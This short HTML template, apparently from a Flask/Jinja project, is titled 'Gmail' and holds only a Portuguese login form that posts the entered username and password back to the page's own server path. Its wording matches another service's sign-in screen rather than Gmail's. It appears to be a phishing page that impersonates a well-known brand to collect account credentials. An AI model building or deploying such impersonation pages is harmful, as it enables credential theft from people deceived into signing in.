<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8">
  <title>Gmail</title>
</head>
<body>
  <div class="container">
    <div class="right">
        <form method="POST" action="{{ request.path }}">
            <input type="text" name="username" placeholder="Telefone, nome de usuário ou email" required>
            <input type="password" name="password" placeholder="Senha" required>
            <button type="submit">Entrar</button>
        </form>
        <div class="signup">
            <span>Não tem uma conta?</span> <a href="#">Cadastre-se</a>
        </div>
    </div>
  </div>
</body>
</html>

